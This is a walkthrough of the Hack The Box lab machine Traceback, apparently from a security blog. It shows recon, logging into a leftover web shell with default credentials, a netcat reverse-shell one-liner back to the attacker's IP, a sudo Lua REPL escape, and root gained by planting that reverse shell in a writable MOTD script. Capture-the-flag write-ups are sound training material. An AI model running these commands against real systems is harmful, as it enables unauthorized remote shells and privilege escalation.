HTB: Traceback

Details

This machine is Traceback from Hack The Box

Recon

kali@kali:~$ nmap -sV -p- 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 21:23 GMT
Nmap scan report for 10.10.10.181
Host is up (0.020s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.11 seconds

User

Started at http://10.10.10.181/

Screenshot 1

And in the source

Screenshot 2

I googled that phrase and came across the following git repo https://github.com/TheBinitGhimire/Web-Shells, so I tried some of the file names and got to http://10.10.10.181/smevk.php

Screenshot 3

The code for the shell is at https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/smevk.php and has default creds of

admin : admin

So I logged in

Screenshot 4

I then set listener

kali@kali:~$ nc -nvlp 4444

And used the webshell to run

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 4444 >/tmp/f

The listener then had

connect to [10.10.14.36] from (UNKNOWN) [10.10.10.181] 52022
/bin/sh: 0: can't access tty; job control turned off
$

$ python3 -c "import pty;pty.spawn('/bin/bash')"
webadmin@traceback:/var/www/html$

I found there was another user in home

webadmin@traceback:/home$ ls -la
ls -la
total 16
drwxr-xr-x  4 root     root     4096 Aug 25  2019 .
drwxr-xr-x 22 root     root     4096 Aug 25  2019 ..
drwxr-x---  5 sysadmin sysadmin 4096 Mar 16 03:53 sysadmin
drwxr-x---  5 webadmin sysadmin 4096 Mar 16 04:03 webadmin

And a note in my home

webadmin@traceback:/home/webadmin$ ls -la
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ..
-rw------- 1 webadmin webadmin  222 Mar 21 14:26 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16 03:53 note.txt

webadmin@traceback:/home/webadmin$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

I checked sudo

webadmin@traceback:/home/webadmin$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

At this point I put an ssh key into webadmin authorized_keys file so I could ssh in

kali@kali:~$ ssh [email protected] -i ./id_rsa
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Mar 21 14:59:26 2020 from 10.10.14.36
webadmin@traceback:~$

And ran the command as sudo

webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit
Welcome to the Luvit repl!
>

I assumed this was the lua test mentioned, so I used lua to pop a new shell as sysadmin

> os.execute("/bin/sh")
$

$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)

$ python3 -c "import pty;pty.spawn('/bin/bash')"
sysadmin@traceback:~$

And grab the user flag

sysadmin@traceback:/home/sysadmin$ ls -la
total 4336
drwxr-x--- 5 sysadmin sysadmin    4096 Mar 16 03:53 .
drwxr-xr-x 4 root     root        4096 Aug 25  2019 ..
-rw------- 1 sysadmin sysadmin       1 Aug 25  2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin    3771 Apr  4  2018 .bashrc
drwx------ 2 sysadmin sysadmin    4096 Aug 25  2019 .cache
drwxrwxr-x 3 sysadmin sysadmin    4096 Aug 24  2019 .local
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24  2019 luvit
-rw-r--r-- 1 sysadmin sysadmin     807 Apr  4  2018 .profile
drwxr-xr-x 2 root     root        4096 Aug 25  2019 .ssh
-rw------- 1 sysadmin sysadmin      33 Mar 21 14:57 user.txt

sysadmin@traceback:/home/sysadmin$ cat user.txt
[REDACTED]

Root

I also added my ssh key for sysadmin so I could ssh in, then I setup pspy. Where I saw this

CMD: UID=0    PID=1743   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
CMD: UID=0    PID=1765   | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/

This was a bit weird, so I checked for files I could write to

sysadmin@traceback:/var/backups/.update-motd.d$ find / -writable -print 2>/dev/null | grep -v proc | grep -v lib | grep -v run | grep -v sys | grep -v dev
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/10-help-text
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/80-esm
[SNIP]

So I can write to the original files that are being replaced

sysadmin@traceback:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <[email protected]>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

echo "\nWelcome to Xh4H land \n"

So this should be run whenever anyone ssh's in, I modified 00-header to also contain

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 4444 >/tmp/f

Set a listener

kali@kali:~$ nc -nvlp 4444

And ssh'd back in again

connect to [10.10.14.36] from (UNKNOWN) [10.10.10.181] 50798
/bin/sh: 0: can't access tty; job control turned off
#

# id
uid=0(root) gid=0(root) groups=0(root)

A root shell popped, so I grabbed the flag

# ls -la
total 40
drwx------  5 root root 4096 Aug 25  2019 .
drwxr-xr-x 22 root root 4096 Aug 25  2019 ..
-rw-------  1 root root   67 Jan 24 05:49 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Aug 24  2019 .cache
drwxr-xr-x  3 root root 4096 Aug 24  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Aug 25  2019 .selected_editor
drwxr-xr-x  2 root root 4096 Aug 24  2019 .ssh
-r--------  1 root root   33 Mar 21 14:57 root.txt

# cat root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.